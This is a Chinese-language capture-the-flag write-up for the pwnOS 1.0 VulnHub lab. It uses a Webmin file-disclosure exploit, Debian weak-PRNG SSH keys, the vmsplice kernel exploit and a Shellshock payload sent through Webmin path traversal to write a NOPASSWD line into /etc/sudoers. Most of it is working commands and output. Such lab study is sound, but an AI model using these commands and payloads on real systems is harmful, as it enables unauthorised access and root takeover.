继续 PWNOS: 1.0 解法一
说在前面
/etc/passwd里有四个用户,因为用户管理该靶机时,肯定用ssh和密码登录,也许不用ssh,如果用了就是一条新的路径。
Authorized_key文件获取
# yunki @ yunki in ~/vulnhub/pwnos1 [16:38:27]
$ sudo perl 2017.pl 192.168.54.4 10000 /home/vmware/.ssh/authorized_keys 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.54.4 on port 10000!
FILENAME: /home/vmware/.ssh/authorized_keys
FILE CONTENT STARTED
-----------------------------------
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm
-------------------------------------
上面这个是公钥。
发现敏感文件
https://github.com/carlospolop/Auto_Wordlists
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt
https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt
用公钥信息破解出私钥(伪随机数生成器)
pseudo random number generator
# yunki @ yunki in ~/vulnhub/pwnos1 [16:48:55]
$ searchsploit prng
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (1) | multiple/remote/32673.java
GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy (2) | multiple/remote/32674.cpp
LPRng (RedHat 7.0) - 'lpd' Format String | linux/remote/227.c
LPRng - use_syslog Remote Format String (Metasploit) | linux/remote/16842.rb
LPRng 3.6.22/23/24 - Remote Command Execution | linux/remote/226.c
LPRng 3.6.24-1 - Remote Command Execution | linux/remote/230.c
LPRng 3.6.x - Failure To Drop Supplementary Groups | unix/local/20923.c
LPRNG html2ps 1.0 - Remote Command Execution | unix/remote/21974.pl
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby) | linux/remote/5632.rb
--------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
# yunki @ yunki in ~/vulnhub/pwnos1 [16:51:00]
$ searchsploit -m 5622
Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH
URL: https://www.exploit-db.com/exploits/5622
Path: /usr/share/exploitdb/exploits/linux/remote/5622.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/pwnos1/5622.txt
根据5622.txt内容下载文件。
# yunki @ yunki in ~/vulnhub/pwnos1 [9:34:08]
$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
# yunki @ yunki in ~/vulnhub/pwnos1 [9:34:08]
$ sudo tar vjxf 5622.tar.bz2
# yunki @ yunki in ~/vulnhub/pwnos1 [9:33:13]
$ sudo grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14"
rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566.pub
# yunki @ yunki in ~/vulnhub/pwnos1 [9:34:01]
$ find . -name "d8629ce6dc8f2492e1454c13f46adb26-4566*"
./rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566.pub
./rsa/2048/d8629ce6dc8f2492e1454c13f46adb26-4566
获取初始 shell
# yunki @ yunki in ~/vulnhub/pwnos1 [9:46:18] C:127
$ sudo ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.54.4
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Tue Mar 14 04:14:22 2023 from 192.168.54.128
vmware@ubuntuvm:~$
提权 :way 1:内核提权
vmware@ubuntuvm:~$ uname -r
2.6.22-14-server
这里2.6.22已经是很细的版本了,这里搜索漏洞时不能太细,也不能太粗。这样会出现太多,或者太少。下面的指令会出现很多,在试了很多个exp后不行后,选择了vmsplice
这个exp。
# yunki @ yunki in ~/vulnhub/pwnos1 [9:52:07]
$ searchsploit 2.6.2 | grep "Privilege Escalation"
Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation | linux/local/160.c
Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2) | linux/local/5092.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method) | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
Linux Kernel 2.6.23 < 2.6.24 - 'vmsplice' Local Privilege Escalation (1) | linux/local/5093.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Local Privilege Escalation | linux_x86-64/local/15024.c
Linux Kernel 2.6.28/3.0 (DEC Alpha Linux) - Local Privilege Escalation | linux/local/17391.c
Linux Kernel 2.6.29 - 'ptrace_attach()' Race Condition Privilege Escalation | linux/local/8678.c
Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation | linux/local/8673.c
Linux Kernel < 2.6.22 - 'ftruncate()'/'open()' Local Privilege Escalation | linux/local/6851.c
Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation | linux/local/33523.c
Linux Kernel < 2.6.29 - 'exit_notify()' Local Privilege Escalation
kali
# yunki @ yunki in ~/vulnhub/pwnos1 [9:52:15]
$ searchsploit -m 5092
Exploit: Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)
URL: https://www.exploit-db.com/exploits/5092
Path: /usr/share/exploitdb/exploits/linux/local/5092.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/pwnos1/5092.c
# yunki @ yunki in ~/vulnhub/pwnos1 [9:54:22]
$ sudo php -S 0:80
[Wed Mar 15 09:54:36 2023] PHP 7.4.15 Development Server (http://0:80) started
[Wed Mar 15 09:55:17 2023] 192.168.54.4:60816 Accepted
[Wed Mar 15 09:55:17 2023] 192.168.54.4:60816 [200]: (null) /5092.c
[Wed Mar 15 09:55:17 2023] 192.168.54.4:60816 Closing
靶机
vmware@ubuntuvm:~$ wget http://192.168.54.128/5092.c
--04:23:27-- http://192.168.54.128/5092.c
=> `5092.c'
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6,580 (6.4K) [text/x-c]
100%[========================================================>] 6,580 --.--K/s
04:23:27 (604.20 MB/s) - `5092.c' saved [6580/6580]
vmware@ubuntuvm:~$ gcc 5092.c -o 5092
5092.c:289:28: warning: no newline at end of file
vmware@ubuntuvm:~$ chmod +x 5092
vmware@ubuntuvm:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e12000 .. 0xb7e44000
[+] root
提权:way 2:shellshock
验证是否有shellshock
一般需要bash版本在4.3
以下
vmware@ubuntuvm:~$ bash --version
GNU bash, version 3.2.25(1)-release (i486-pc-linux-gnu)
Copyright (C) 2005 Free Software Foundation, Inc.
# 验证代码
vmware@ubuntuvm:~$ env x='() { :; }; echo "It is vulnerable"' bash -c date
It is vulnerable
Tue Mar 14 04:32:52 CDT 2023
shellshock的利用
初始和准备:
vmware@ubuntuvm:~$ pwd
/home/vmware
vmware@ubuntuvm:~$ vim yunki.cgi
# 将 "#!/bin/bash"写入yunki.cgi
vmware@ubuntuvm:~$ chmod +x yunki.cgi
vmware@ubuntuvm:~$ sudo -l
[sudo] password for vmware:
sudo: pam_authenticate: Conversation error
shellshock利用:
先阅读之前的2017.perl,发现原理很简单,通过访问urlhttp://192.168.54.4:10000/unauthenticated/
在加上若干个..%01/
,最后加上需要访问的文件名。即我们需要访问yunki.cgi
,那就是http://192.168.54.4:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/yunki.cgi
。
这里使用curl
# yunki @ yunki in ~/vulnhub/pwnos1 [10:16:08] C:130
$ sudo curl http://192.168.54.4:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/home/vmware/yunki.cgi -A '() { :; }; /bin/echo "vmware ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'
<h1>Error - Missing Content-Type Header</h1>
# 用shellshock,给vmware加上,无密码执行任何命令的权限。
# '() { :; }; /bin/echo "vmware ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers'
# ;(分号):分隔两个独立的shell命令,可以在同一行上使用多个命令。
# () { :; };:这是利用Shellshock漏洞的关键部分,其通过将函数定义为环境变量的值来执行恶意代码(在括号内)。此处的“:”冒号是一个shell内置命令,这个函数没有必要执行任何操作,因为它已经成功地利用了漏洞。
# /bin/echo:指示在系统上查找并使用echo命令。
# "vmware ALL=(ALL) NOPASSWD: ALL":是需要添加到sudoers文件的行,包含将vmware用户添加到具有完全sudo权限的文件列表中的命令,它将允许该用户在不输入密码的情况下执行任何命令。
# etc/sudoers:将上述命令追加到sudoers文件中,前提是攻击者拥有sudo权限或可以通过其他方式访问该文件。
利用shellshocck后:
vmware@ubuntuvm:~$ sudo -l
User vmware may run the following commands on this host:
(ALL) NOPASSWD: ALL
vmware@ubuntuvm:~$ sudo /bin/bash
root@ubuntuvm:~#